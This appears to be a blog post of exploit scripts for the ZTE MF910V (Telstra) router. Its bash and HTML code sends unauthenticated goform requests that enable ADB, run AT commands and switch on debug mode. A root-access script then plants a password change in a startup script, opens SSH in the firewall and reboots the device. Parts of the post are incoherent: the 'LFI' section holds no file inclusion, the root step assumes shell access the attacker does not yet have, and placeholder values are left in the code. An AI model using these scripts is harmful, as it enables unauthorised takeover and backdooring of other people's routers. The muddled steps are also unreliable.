Telstra ZteMF910/v Exploit Scripts
Telstra ZteMF910/v Exploit Scripts
To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.
Mode Switching and Enabling ADB
To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:
language-bash
#!/bin/bash
# Mode Switching
MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
MODE_SWITCH_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" $MODE_SWITCH_URL
# Enabling ADB
ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X"
ADB_ENABLE_VALUE="6" # Change X to the desired mode (1-4 for RNDIS, 5 for CDC, 6 for ADB)
curl -s -X POST -d "goformId=USB_MODE_SWITCH&usb_mode=$ADB_ENABLE_VALUE" $ADB_ENABLE_URL
Save the above script as mode_switch.sh
and execute it using bash mode_switch.sh
. This will perform mode switching and enable ADB on the router.
Executing AT Commands and Enabling Debug Mode
To execute AT commands and enable debug mode on the ZTE MF910V router, we can use the same bash script as above. However, we need to modify the URLs and values accordingly. Here's an example:
language-bash
#!/bin/bash
# Executing AT Commands
AT_COMMANDS_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=AT_COMMAND&command=AT+COMMAND_HERE"
curl -s -X POST -d "goformId=AT_COMMAND&command=AT+COMMAND_HERE" $AT_COMMANDS_URL
# Enabling Debug Mode
DEBUG_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
DEBUG_ENABLE_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$DEBUG_ENABLE_VALUE" $DEBUG_ENABLE_URL
Save the above script as at_commands.sh
and execute it using bash at_commands.sh
. This will execute AT commands and enable debug mode on the router.
Exploiting LFI (Local File Inclusion)
To exploit the LFI vulnerability on the ZTE MF910V router, we need to modify certain files and uncomment specific functions. We can achieve this by creating an HTML file that makes the necessary changes. Here's an example:
language-html
<!DOCTYPE html>
<html>
<head>
<script>
function enableSDCard() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd_card_state&cfg_value=1", true);
xhr.send();
}
function enableHttpShare() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare_guest&cfg_value=1", true);
xhr.send();
}
function enableSDCardMenu() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd&cfg_value=1", true);
xhr.send();
}
function enableSDCardFileViewer() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare&cfg_value=1", true);
xhr.send();
}
</script>
</head>
<body>
<button onclick="enableSDCard()">Enable SD Card</button>
<button onclick="enableHttpShare()">Enable HTTP Share</button>
<button onclick="enableSDCardMenu()">Enable SD Card Menu</button>
<button onclick="enableSDCardFileViewer()">Enable SD Card File Viewer</button>
</body>
</html>
Save the above code as exploit.html
and open it in a web
browser. Clicking on the buttons will send the necessary HTTP requests
to enable the corresponding features.
Gaining Root Access
To gain root access on the ZTE MF910V router, we need to modify certain files and execute specific commands. We can achieve this by creating a bash script. Here's an example:
language-bash
#!/bin/bash
# Modify firewall_init.sh
sed -i '92,93s/^/#/' /usr/zte/zte_conf/scripts/firewall_init.sh
echo -e "echo 'password\npassword\n' | passwd" >> /usr/zte/zte_conf/scripts/firewall_init.sh
# Enable SSH
iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT
# Reboot the device
reboot
Save the above script as root_access.sh
and execute it using bash root_access.sh
.
This will modify the necessary files, enable SSH, and reboot the
device. After the reboot, you can SSH into the router using the
specified username and password.
Comments
Post a Comment